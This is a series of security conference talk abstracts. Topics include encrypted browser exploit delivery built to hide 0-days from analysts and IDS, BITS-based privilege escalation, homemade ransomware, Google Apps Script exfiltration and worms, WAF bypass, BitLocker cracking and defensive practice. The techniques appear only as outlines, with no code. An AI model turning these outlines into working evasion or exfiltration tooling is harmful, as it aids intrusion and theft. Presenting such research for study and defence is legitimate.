A lot is expected of software developers these days; they are expected to be experts in everything despite very little training.  Throw in the IT security team (often with little-to-no knowledge of how to build software) telling developers what to do and how to do it, and the situation is further strained. This silo-filled, tension-laced situation, coupled with short deadlines and mounting pressure from management, often leads to stress, anxiety and less-than-ideal reactions from developers and security people alike.

This talk will explain how people’s personal insecurities can be brought out by leadership decisions in the way we manage our application security programs, and how this can lead to real-life vulnerabilities in software and other IT products.  This is not a soft talk about “feelings”, this is a talk about creating programs, governance and policies that ensure security throughout the entire SDLC.

No more laying blame and pointing fingers, it’s time to put our egos aside and focus on building high-quality software that is secure. The cause and effect of insecurities and other behavioural influencers, as well as several detailed and specific solutions will be presented that can be implemented at your own place of work, immediately. No more ambiguity or uncertainty from now on, only crystal clear expectations.

Zero-day exploits targeting browsers are usually very short-lived. These zero-days are actively gathered and analyzed by security researchers. Whenever a new 0-day becomes known by the security industry, protections against the exploit are shared, AV/IDS signatures made, patches deployed, and the precious 0-day loses its value.

For example, when Ahmed Mansoor was targeted by an iOS 0-day exploit (August 2016). the Citizen Lab analyzed the 0-day exploit, and Apple patched the vulnerability within days (http://bit.ly/2bm8ueo). Whoever targeted Mansoor, lost a precious 0-day exploit worth hundreds of thousands of dollars.

In my research, I propose a solution for law enforcement, 0-day brokers, and advanced attackers to protect their browser exploits. The key step is to establish a key agreement between the exploit server and the victim browser. After a shared key is set up, attackers can encrypt the real exploit with AES. It is recommended to encrypt both the code to trigger the exploit, and the shellcode. This idea was first published by me (http://bit.ly/2mnvfYE), and quickly adopted by exploit kit developers in-the-wild.

During my presentation, I will propose solutions for defenders to analyze these attacks, countermeasures for attackers to further complicate this kind of analysis and release a POC Ruby code which can be integrated into Metasploit. So far, no encrypted browser exploit delivery code is available in the public to test or implement these attacks.
In addition to protecting the 0-day exploits from analysis, my proposed solution is also able to stay under the radar in IDS systems or Next Generation IDS systems (a.k.a. breach detection systems, APT detection systems). This is aligned with the trend that perimeter security is becoming less effective due to mobile devices and the increasing number of encrypted channels.

In 2016 a non-profit organization, GDI.foundation, operated by volunteers, started reporting vulnerabilities as responsible disclosures (coordinated vulnerability disclosures) and helping victims of ransom attacks worldwide under the name PROJECT366.

As chairman & co-founder of that organization I would like to share the experiences and challenges they have faced so far. In the last 19 years I, Victor Gevers (@0xDUDE) have made over 5,250 security reports without getting in trouble with the law. In this talk, you’ll be taken through the experiences of the last 19 years in “how you could report ‘bad news’ and show our attempts to report as many vulnerabilities as humanly possible and how to deal with those on the other side, the organizations who receive these reports and the challenges each side faces.

Threats are a growing problem for people and organizations across the globe.With millions of malicious programs in the wild it has become hard to detect zero-day attacks and polymorphic viruses.This is why the need for machine learning-based detection arises ... A good understanding of malware analysis and Machine learning models is vital to ensure taking wise decisions and building a secure environment by being capable of correctly identifying and mitigating such potential threats

The PeopleSoft Campus Solutions is used in more than 1000 universities worldwide. In this presentation we will show how to use several vulnerabilities to gain access to the entire information system of the University. And it means grade fraud, sabotage, access to student information, access to credit cards, bills, payment plans, fees, etc. In this presentation, we'll look at the architecture of peoplesoft products, its strengths and weaknesses. We show attack surface, and demonstrate a practical attack on the system. We also prove how one vulnerability affects a whole family of products, Oracle PeopleSoft, not just PeopleSoft Campus Solutions.

This talk covers skip tracing TTPs and countermeasures in the digital and human domains. The audience will be guided through two real world examples of how a regular citizen can use open source tools, exploits, and social engineering to assist law enforcement and profit. Some examples include phishing websites tailored to a fugitive’s resume, geolocating a target through video game clients, and using social media meta-data to build pattern-of-life. As the audience is moved through the process step by step, online and offline countermeasure such as USPS forwarding, false resume writing, and secure communications will also be covered.

The dynamism of terrorism requires a systematic and methodical intelligent strategy for terrorism threat assessment and management. Unwitting weaknesses in approach and deficiencies in scope invite strategic surprise. A thought out assessment, analysis and pro-active security measures coupled with intelligence data help in framing an effective risk mitigation strategy. Measures to mitigate and avoid terrorism risk are reviewed, with a focus on the need for a joined-up global approach, taking into account the threat shifting at all geographical scales, and adopting a sensible risk-informed approach to counter-terrorism resource allocation.

Pakistan, which was once at the top of the list at Global Terror Index as almost all its cities were struck by terrorism resulting in massive casualties and damage to infrastructure, has re-emerged as a developing country due to effective risk mitigation strategy and continued momentum.
The Presenter will give an analysis of terrorism in Pakistan and the strategy adopted in Pakistan for countering terrorism.

How much information about a botnet can one find using a single IP address, domain name or indicator of compromise (IOC)?
What kind of behavior can be determined when looking at attacker and victim infrastructure?

In an attempt to discover and analyze the infrastructure behind large-scale malware activity, we began our research with known indicators from popular botnets, such as Necurs.

Our presentation will highlight co-occuring malicious activities observed on the infrastructure of popular botnets.
We will demonstrate practical techniques for analyzing botnet and malware traffic to provide context that can be used in identifying actor and victim infrastructure and to discover additional IOC's.
We will also show how political and societal world events may influence specific types of malware activity based on locations and times of malware events.
Finally, we will demonstrate a visualization framework that can be used to better understand the connections between infrastructure, threats, victims, and malicious actors.

Come see how Intel AMT can be used to completely own a modern machine permanently and without detection.

In the first half of the talk, we’ll see how an attacker can abuse the legitimate functionalities of Intel AMT to gain long term persistent access with little to no chance of detection. The demoed attack can be executed to take ownership of AMT in less than 60 seconds - either through supply chain or temporary physical access. We will then show how AMT can be used for persistent access to the machine via readily available and easy-to-use C&C tools. Finally, we will cover possible mitigations and preventions against such attacks.

In the second half of the talk, we will walk through the process of doing non-destructive forensics on an Intel AMT to which we don’t know the admin password (i.e. potentially attacker controlled!). We will also describe how to reclaim ownership of the AMT once forensics is complete. Finally, we will be releasing the Linux tooling we developed in order to facilitate AMT forensics.

What is Intel AMT?

Intel AMT is an out-of-band, always-on management technology, embedded into Intel chipsets supporting vPro technology, intended to allow remote management of equipment without the need for a functioning OS. Intel AMT is commonly available on all Intel-based business laptops & desktops as well as many high end consumer laptops & desktops.

Marshmallow was a significant revision for Android as among the most new fea-
tures that were introduced one of the most significant is without any doubt the
runtime permissions. The permission model was totally redesigned categorising
the permissions into four main categories. The main concept in this categorisa-
tion is to how much risk a user is exposed to when they are granted. Normal permissions imply the least risk for the user. However, there are some
important issues in this case. Firstly, these permissions are not actually dis-
played to the user; they are not displayed upon installation and the user needs
to dig into several menus to find them for each app. Most importantly though,
these permissions cannot be revoked. Unlike dangerous permissions, where the
user can grant or revoke a permission whenever deemed necessary, the normal
persmissions are automatically granted and cannot be revoked, unless the user
uninstalls the app that uses them. The research question that arises from this
change is whether the apps that request only normal permissions are benign.
Note that an app requesting only normal permissions will never request any
alerting action from the user, hence the user is more probable to install it and
not worry about it. Furthermore, since these persmissions are automatically
granted, this means that any malicious action that could be made with such
permissions can be ported to any installed app as they will not require any user
interaction.
Our extensive experiments have shown that apps based only on the normal
permissions are far from being considered benign as they can exploit many na-
tive Android mechanisms to perform many malicious actions. More precisely, we
present many methods which exploit the capabilities of user interface, voice as-
sistants and intents in Android that lead to serious security issues. An overview
of where these actions can be applied will be illustrated, indicating where
Nougat is still vulnerable. The attacks which will be presented have already been disclosed to Google and Microsoft, and in some of these cases the appropriate patches have been made.

Given the rise in popularity of cloud computing and platform-as-a-
service, vulnerabilities inherent to systems which share hardware
resources will become increasingly attractive targets to malicious
software authors.
In this paper, we introduce a novel side channel across virtual
machines through the detection of out-of-order execution. We cre-
ate a simple duplex channel as well as a broadcast channel. We
discuss possible adversaries for this channel and propose further
work to make this channel more secure, efficient and applicable
in realistic scenarios. In addition, we consider seven possible mali-
cious applications of this channel: theft of encryption keys, program
identification, environmental keying, malicious triggers, denial of
service attacks, determining VM co-location, malicious data injec-
tion, and side channels.

When we're talking and thinking about security, we very often have a rather fixed mindset and keep using what we think are proven methods. We tend not to question our decisions and thoughts, and the way how our brains work reaffirms our bias and our mediocre choices. In this talk we take a closer look at how we are thinking, and how we can change or expand this as well as our perception, by hacking into our own brains in order to get a clearer picture of what we really want and need. New ways of thinking and creativity can be a vital new asset for blue and red teams.

As of late, Forensic Accounting seems to be the fastest growing area of accounting. The Association of Certified Fraud Examiners (ACFE) - the world’s largest anti-fraud organization - states that “Forensic Accountants combine their accounting knowledge with investigative skills in various litigation support and investigative accounting settings”; or more detailed: they are performing forensic research to trace funds and identify assets for recovery, conducting forensic analysis of financial data, and preparing forensic accounting reports from financial findings and analytical data for litigation. All in all, they are forced to grasp the substance of situations and look beyond the numbers. (http://www.acfe.com) In the Guide to Forensic Accounting Investigations (edited by Golden et al., 2011), Skalak et al. state that an audit responds to the risk of fraud, while forensic accounting investigation responds to allegation, suspicions, or evidence of fraud. The latter is examined by various current studies.
This contribution gives an overview of “What” is forensic accounting, “Why” it is needed, “What” techniques and practices exist and skills of accountants are important, as well as “How” it works (forensic data analysis) and may benefit business. Furthermore, ways of prevention, risk factors, indicators for internal offenders as well as starting points for trends and future research will be presented.

JavaScript Object Notation (JSON) has evolved to the de-
facto standard file format in the web used for application
configuration, cross- and same-origin data exchange, as well
as in Single Sign-On (SSO) protocols such as OpenID Con-
nect. To protect integrity, authenticity and confidentiality
of sensitive data, JavaScript Object Signing and Encryp-
tion (JOSE) was created to apply cryptographic mechanisms
directly in JSON messages.
We investigate the security of JOSE and present different
applicable attacks on several popular libraries. We introduce
JOSEPH (JavaScript Object Signing and Encryption Pen-
testing Helper) – our newly developed Burp Suite extension,
which automatically performs security analysis on targeted
applications. JOSEPH’s automatic vulnerability detection
ranges from executing simple signature exclusion or signa-
ture faking techniques, which neglect JSON message integrity,
up to highly complex cryptographic Bleichenbacher attacks
breaking the confidentiality of encrypted JSON messages. We
found severe vulnerabilities in six popular JOSE libraries.
We responsibly disclosed all weaknesses to the developers
and helped them to provide fixes.

Security awareness campaigns aim at educating and training your workforce with regards to IT security. Those trainings take time and can be rather complex - which makes them also expensive. However, we still lack the scientific base of how to design a successful security awareness campaign and how to evaluate it's success. Especially when it comes to elaborate social engineering attacks. In this talk I will introduce scientific sound methods and tools from industrial and organisational psychology and industrial education to measure the success of security awareness campaigns. I will show human factors that enable or limit the success of training campaigns and how to enhance future campaigns based on lessons learned from former campaigns. All while keeping in mind that humans are not the weakest link in a security system, but the only defensive measure we have.

2016 saw a substantial rise in ransomware attacks and in some cases the return of some favourites with Cryptowall, CTB-LOCKER and TeslaCrypt being some of the most popular. The volume of attacks was in fact pretty steady for a good part of the year, with regular campaigns coming out on a weekly basis. It was interesting to see the variety in mechanisms used for the ransomware which not only included self-contained binaries but went all the way to the use of scripts. As part of the research I conducted last year, I wanted to understand why there's such a drive and lure for ransomware, outside of the victims payment, as well as have some way of properly testing "anti-ransomware" solutions with an unknown variant. So to do that, I went ahead and built my own ransomware and drew some conclusions on why it became so popular. This talk explore the background and process used to build a live ransomware that I was able to use for controlled testing. To finally draw some of my own personal conclusions.

Detection of binary functions in compiled code is a major stepping
stone towards any advanced binary analysis technique. Nucleus [1]
is a novel algorithm based on the idea of using the interprocedural
control flow graph to detect function boundaries. Building upon this
technology we propose a new approach to solve the related problem
of identifying previously-seen known functions within a binary.
Our idea is based on comparing the control flow graphs (CFGs)
of unknown functions from a binary to known functions from a
previously generated database. Compared to traditional approaches,
our method is aware of the underlying graph matching problem
being performed on CFGs of binary code: First, it utilizes instruction
level knowledge about basic blocks as additional constraints for
graph isomorphism. Second, optimizations and transformations
introduced by different compilers affecting the shape of the CFG
are taken into account.
Our approach aims to avoid false positives (wrongly assigning a
known function symbol to an unknown function) at all cost: The
evaluation shows that this method is very effective in reducing false
positive matches (below one percent in most cases) maintaining
recall rates as high as 72.8% when matching functions across two
different nginx versions (1.12.1 and 1.10.3).

Google Apps Scripts is a JavaScript cloud scripting language that provides easy ways to automate tasks across Google products and third party services and build web applications. However, it also provides relatively easy ways for attackers to automate infiltration, propagation, exfiltration and maintaining access to a compromised G Suit powered organization. While the platform has been used successfully for C&C (Carabank) previously, we feel it only scratched the surface as potential vectors go.

In this talk we'll present original and innovative methods of launching classical attacks using Google Scripts as well as possible ways of detecting and preventing those attacks.

Presentation Outline

1. Scripts intro & background.
- Types of scripts
- Capabilities & limitations 

2. Infiltration examples
- Standalone/URL — direct script sent to a victim, using the Google domain as the trust vehicle
- Bounded scripts — scripts can be embedded to documents, much like Office Macros, having similar capabilities,

3. Exfiltration / Communication Examples
- Auto forward emails — bypass Google forward limitation, forward users email to us, remove traces of sent email
- Post to external URL — post selected files contents via encoded headers to a remote drop location of our choice
- Google scripts as C&C — (Carabank discussion?)

** DEMO ** Use Google apps script as a self executing javascript inside a Google Doc and send it to multiple users as a phishing campaign.

4. Propagation - “Google Docs” worm discussion. Creating “Google Docs” worm with Google Apps Scripts

5. Detecting and preventing malicious scripts
- Whitelist / Blacklist, permission based, pre-defined
- Scripts Static Analysis, enumeration based on scripts contents

Windows’ BITS service is a middleman for your download jobs. You start a BITS job, and from that point on, BITS is responsible for the download. But what if we tell you that BITS is a careless middleman?

We have uncovered the way BITS maintains its jobs queue using a state file on disk, and found a way for a local administrator to control jobs using special modifications to that file.
Comprehending this file’s binary structure allowed us to change a job’s properties (such as RemoteURL, Destination Path...) in runtime and even inject our own custom job, using none of BITS’ public interfaces. This method, combined with the generous notification feature of BITS, allowed us to run a program of our will as the LocalSystem account, within session 0.

So if you wish to execute your code as NT AUTHORITY/SYSTEM and the first options that come to mind are psexec/creating a service, we now add a new option: BITSInject.
Here, we will not only introduce the practical method we formed, but also: Reveal the binary structure of the state file for you to play with, and some knowledge we gathered while researching the service flow;
We will also provide free giveaways: A one-click python tool that performs the described method; SimpleBITSServer - a pythonic BITS server; A struct definition file, to use for parsing your BITS state file.

Voice over LTE (VoLTE) as well as Voice over WiFi (VoWiFi) are variants of Voice over IP that makes use of IP Multimedia Subsystem (IMS) in its backend. In this talk, we identify five different attacks on VoLTE/VoWiFi.

This includes mainly (i)sniffing VoLTE/VoWiFi interfaces, (ii)extracting IPSec keys from IP Multimedia Services Identity Module (ISIM) that is embedded within the SIM card, and (iii)performing three different kinds of injection attacks in Session Initiation Protocol (SIP) headers that are used for signaling of VoLTE/VoWiFi.As a result of VoLTE/VoWiFi sniffing, we identified information disclosures such as leaking IMSI, IMEI, location of users and private IP of IMS. 

We also managed to extract the ciphering key and the integrity key (CK/IK) used for IPSec from ISIM with the help of a hardware device called SIMTrace.
We also discuss three different SIP header injection attacks that enables location manipulation and side channel attacks.

It is important to note here that all these attacks are valid on the current 3GPP standards that are used by telecom providers. Thus understanding the attacks and mitigating them is of high relevance.

This is a continuation of the work presented by Schmidt et.al in the talk IMSecure – Attacking VoLTE at Areas41 conference, 2016.

Cyber Security and Critical Infrastructure Protection (CIP) are major topics almost everywhere. Its priority has also increased during recent years because of rising incidents, even if the focus is still on a sectoral approach and on prevention. And there's the issue of delayed detection.How to cope with significant infrastructure interruptions if protection efforts fail and possible cascading effects occur is hardly public knowledge, nor do people have the necessary capabilities to deal with them. The shared belief that it won’t happen is still overwhelming. But it could be a Turkey-Illusion.
DDoS, IoT-attacks, ransomware, vulnerabilities, unpatchable IT-systems, ... the list of current IT-problems and challenges is endless. Every security expert is daily fighting an unwinnable battle. But what would it mean to our society, if infrastructure systems fail on a broad scale? How can we reduce these risks? And how can we make infrastructures more robust and people resilient?
This talk will look at cyber security from a different perspective and open your eyes to a hardly recognised danger to our modern and heavily interconnected world.

BitLocker is a full-disk encryption feature available in recent Windows versions. It is designed to protect data by providing encryption for entire volumes and it makes use of a number of different authentication methods. In this work we present a solution, named BitCracker, to attempt the decryption, by means of a dictionary attack, of memory units encrypted by BitLocker with a user supplied password. To that purpose, we resort to GPU (Graphics Processing Units) that are, by now, widely used as general-purpose coprocessors in high performance computing applications.
BitLocker decryption process requires the execution of a very large number of SHA-256 hashes and also AES, so we propose a very fast solution, highly tuned for Nvidia GPU, for both of them. In addition we take the advantage of a weakness in the BitLocker decryption algorithm to speed up the execution of our attack.
We benchmark our solution using the three most recent Nvidia GPU architectures (Kepler, Maxwell and Pascal), carrying out a comparison with the Hashcat password cracker.
Finally, our OpenCL implementation of BitCracker has been recently released within John The Ripper, Bleeding-Jumbo version.

This talk will teach you how to attack applications secured by a WAF. The presenter will describe the newest WAF bypassing techniques and provide a systematic and practical approach on how to bypass WAFs. WAFNinja, a tool that helps to find vulnerabilities in WAFs, will be introduced.

Automating response to cyber security incidents is the trend which is - considering increasing amount of incidents organizations handle and ever-increasing attack surface - already becoming mainstream.

In this talk I explore the options for exploiting OpenDXL in the real life situation of mixed environments, legacy solutions and multiple vendors for connecting existing and future cyber security system components for coordinated information exchange and orchestrating incident response actions.

A light-hearted trip through security failures both physical and electronic that have enabled me over the years to circumvent security of most of the worlds largest banks. Through the use of tales from the front line and useful illustrative slides, I will attempted to take you through the lessons to be learned from an ethical hacker with a penchant for breaking into the impossible. Let me take you on a rollercoaster ride of epic fails and grandiose plans and my Jason Bourne like adventures including Lockpicking, Kidnap, Police chases and multi-million pound bank heists.

Tor's Onion Services are often labeled as "The Darknet". The place where people can do all sorts of things without the possibility of being discovered. In practice those services have quite a number of weaknesses and people do actively exploit them. This talk will present some of those attacks and countermeasures which are currently deployed.

EnCase Forenic Imager is a tool used by forensic investigators to gather evidence from storage media. We used a custom tool to fuzz the file system parser code of this product and found a buffer overflow vulnerability in the LVM2 parser. We demonstrate our approach we used to fuzz EnCase Forensic Imager, describe the technical details of the vulnerability and show how this vulnerability can be exploited to execute arbitrary code on the investigator's machine. We wrap up our talk by discussing the impact of this vulnerability on forensic evidence.

While 'security is not a team', you'll find that most companies growing just beyond 60-80 people start employing a group of people focusing primarily on the topic. But the culture of secure engineering in a company does not only strongly correlate with when you start building a security team - it becomes (and grows as) a matter of how they connect with the rest of your organization, and make security, adversarial thinking, and the care for user safety and privacy part of everyone's concern. In this talk, we will review what the purposes of a security team can be, which challenges you'll face, how you can make it scale beyond the team's boundaries; as well as proven good practices of running (fairly operational) engineering teams themselves. Whether your organization already has a security team or is currently distributing security demands across areas, you'll be able to take away how to build (out) a dedicated security team and make your engineers (and, spoiler alert, other teams!) happy, healthy, and sustainable for the years to come.